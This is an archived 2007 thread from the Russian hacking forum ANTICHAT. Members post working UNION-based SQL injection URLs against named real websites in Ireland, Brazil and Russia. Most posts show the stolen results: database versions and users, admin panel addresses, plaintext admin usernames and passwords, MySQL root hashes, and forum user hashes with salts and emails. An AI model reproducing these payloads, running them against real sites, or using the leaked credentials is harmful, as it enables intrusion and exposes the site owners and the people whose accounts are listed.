ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
30.12.2007, 02:52
|
|
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520
Репутация:
572
|
|
sql
http://battle8.hip-hop.ru/index.php?mode=articles&id=-6+union+select+1,2/*
Народ напишите в Пм кто раскрутить может помочь..
так навскидку видно, что есть кое-чего -
http://battle8.hip-hop.ru/index.php?mode=articles&id=6+union+select+1,concat _ws(0x3a,id,name,email)+from+users/*
|
|
|
30.12.2007, 03:25
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684
Репутация:
3908
|
|
http://www.pitty.com.br/
Код:
http://www.pitty.com.br/blog.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),version(),data base()),4,5/*
http://www.undime.org.br/
Код:
http://www.undime.org.br/htdocs/index.php?id=-1'+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*
http://www.fesppr.br/
Код:
http://www.fesppr.br/cient/publicacoes.php?id=-1'+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4+from+admin/*
Последний раз редактировалось Ded MustD!e; 30.12.2007 в 03:36..
|
|
|
|
30.12.2007, 06:27
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684
Репутация:
3908
|
|
http://www.propertysaleorrent.ie/
Код:
http://www.propertysaleorrent.ie/detail.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,username,password),0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0+from+admin/*
Админка: http://www.propertysaleorrent.ie/admin/
login: chamlis
pass: amalkne
http://www.chambers.ie/
Код:
http://www.chambers.ie/index.php?id=-1+union+select+1,2,3,concat_ws(0x3a,username,password),5,6,7,8,9,10,11,12,13,14,15,16,17+from+admin/*
Админка: http://www.chambers.ie/admins/
Админов аж 19 штук)))
» caoimhe : policy
» anna : letannain
» pauline : polexecpa
» grainne.oreilly : merrion
» RMM : goodRMM07
» ciara : watercress
» brett : bw325815
» susan : corppatrons
» marion : offmancsp
» richard : headcsp
» kate : projects
» barry : projects2
» Megan : commercial
» james.dunne : teddyBear
» jessica : jdempsey
» AMAS : amas07
» james : jkiernan
» annmcarroll : cahercon
» support : secureRMM07
http://www.explore.ie/
Код:
http://www.explore.ie/ireland/article.php?ID=-1+union+select+concat_ws(0x3a,user(),version(),database())/*
вывод в тайтле
http://www.andrewmoore.ie/
От этого сайта просто в восторге) долго искал, где же выводятся данные, оказалось в текстовом поле "Message:" в ссылке в ее параметре id=.
Код:
http://www.andrewmoore.ie/friend.php?id=-1+union+select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+admin/*
Админка: http://www.andrewmoore.ie/admin/
login: andrewmoore
pass: 194rew803
http://www.camping-ireland.ie/
Код:
http://www.camping-ireland.ie/caravan-parks/camping.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),version(),database())+from+admin/*
для тех, кто подберет колонки, админка: http://www.camping-ireland.ie/caravan-parks/login.html
Последний раз редактировалось Ded MustD!e; 30.12.2007 в 07:22..
|
|
|
|
30.12.2007, 12:51
|
|
Познающий
Регистрация: 10.05.2007
Сообщений: 38
Провел на форуме:
453576
Репутация:
100
|
|
Сообщение от Loker
http://battle8.hip-hop.ru/index.php?mode=articles&id=-6+union+select+1,2/*
Код:
http://battle8.hip-hop.ru/index.php?mode=articles&id=-6+union+select+aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),user(),database()),0x71),0x71),2/**
4.1.18:battle8i@localhost:battle8
|
|
|
|
30.12.2007, 13:31
|
|
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520
Репутация:
572
|
|
sql
Saint-Sky Loker
Этого там нет... (не 6, а -6)
и тем не менее такая таблица с полями там есть... ( попробуй другие названия таблиц и полей, и ощути разницу) и именно 6, а не -6, т.к. не будет видно отличий (отсутствует вывод таблицы). Так что я бы посоветовал посимвольный перебор, но в версиях < 4.1 не поддерживаются подзапросы...
ку? 
Последний раз редактировалось Серенький; 01.01.2008 в 03:56..
|
|
|
|
30.12.2007, 14:26
|
|
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520
Репутация:
572
|
|
Saint-Sky
я так думаю, это говорит о том, что обе эти таблицы есть, но из articles есть прямой вывод, а из users - нет.
http://battle8.hip-hop.ru/index.php?mode=articles&id=6+union+select+1,2+from +users/* - есть вывод статьи
http://battle8.hip-hop.ru/index.php?mode=articles&id=6+union+select+1,2+from +articles/* - есть вывод статьи
http://battle8.hip-hop.ru/index.php?mode=articles&id=-6+union+select+1,2+from+users/* - нет вывода инфы из таблицы
http://battle8.hip-hop.ru/index.php?mode=articles&id=-6+union+select+aes_decrypt(aes_encrypt(concat_ws(0 x3a,count(id)),0x71),0x71),2+from+articles/* - есть вывод инфы из таблицы
|
|
|
|
30.12.2007, 16:33
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
http://www.rakurs.com/?news_id=-4+union+select+1,2,3,4,5,6,7,concat_ws(0x2F,cast(v ersion()+as+binary),cast(database()+as+binary),cas t(user()+as+binary))/*
4.1.10a/rakurs/rakurs@localhost
-----------------------------------------------------------------------------
region-plus.tv
http://www.region-plus.tv/index.php?c=3socium&n=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user()),4,5,6/*
5.0.41-community/region_base2/region_admin@localhost
http://www.region-plus.tv/index.php?c=3socium&n=-1+union+select+1,2,concat_ws(0x2F,username,passwor d,email),4,5,6+from+forums_auth+limit+0,1/*
логин/хеш/мейл
io/6e5149991a779b92918203cc28078fbd/egik_israhell@pisem.net
http://www.region-plus.tv/index.php?c=3socium&n=-1+union+select+1,2,concat_ws(0x2F,login,password), 4,5,6+from+newsmaker+limit+0,1/*
логин/хеш
BIG/3f604f988c27002e752fe43822e0741d
|
|
|
|
30.12.2007, 17:48
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
http://www.ninsis.ru/newsview.php?id=-1'+union+select+1,concat_ws(0x2F,version(),databas e(),user()),3,4,5,6/*
4.1.22-log/dbninsis/root@localhost
http://www.ninsis.ru/newsview.php?id=-1'+union+select+1,concat_ws(0x2F,user,password),3, 4,5,6+from+mysql.user/*
root/*1B8D4E3A1CCB31B260088B7C11FD37BC79A35EE3
|
|
|
|
30.12.2007, 20:33
|
|
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
Провел на форуме:
1273248
Репутация:
785
|
|
sao.mos.ru
Код HTML:
http://sao.mos.ru/?r=13&id=2376+union+select+0,1,2,3,4,5/*
Код HTML:
http://sao.mos.ru/?r=13&id=2376+union+select+0,concat(USER(),VERSION(),DATABASE()),2,3,4,5/*
USER:sao1@chicken
VERSION:4.1.12
DATABASE:sao_pref
Есть таблица user
Код HTML:
http://sao.mos.ru/?r=13&id=2376+union+select+0,1,2,3,4,5+from+user/*
|
|
|
|
30.12.2007, 20:43
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
ruvr.ru
http://www.ruvr.ru/main.php?lng=rus&q=54970&cid=-1+union+select+1,2,3,concat_ws(0x2F,version(),data base(),user())/*&p=30.12.2007
5.0.41-log/ruvr/root@localhost
все таблицы, где есть столбец “password”
http://www.ruvr.ru/main.php?lng=rus&q=54970&cid=-1+union+select+1,2,3,concat(table_name,0x3b,table_ schema)+from+information_schema.columns+where+colu mn_name=0x70617373776F7264/*&p=30.12.2007
user_auth;cacti
user;mysql
mybb_forums;phpbb_es
mybb_users;phpbb_es
punbb_users;phpbb_es
u_users;phpbb_es
http://www.ruvr.ru/main.php?lng=rus&q=54970&cid=-1+union+select+1,2,3,concat_ws(0x2F,user,password) +from+mysql.user/*&p=30.12.2007
root/*F063FF97347E5D3E80B937BCA217308BF22D6E88
http://www.ruvr.ru/main.php?lng=rus&q=54970&cid=-1+union+select+1,2,3,concat_ws(0x2F,username,passw ord,salt,email)+from+phpbb_es.mybb_users+limit+0,1/*&p=30.12.2007
логин/хеш/соль/мейл
adv/c6e9d9efbd87fdce20a3e3009294e109/S11C7Ufl/adv@adv.ru
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
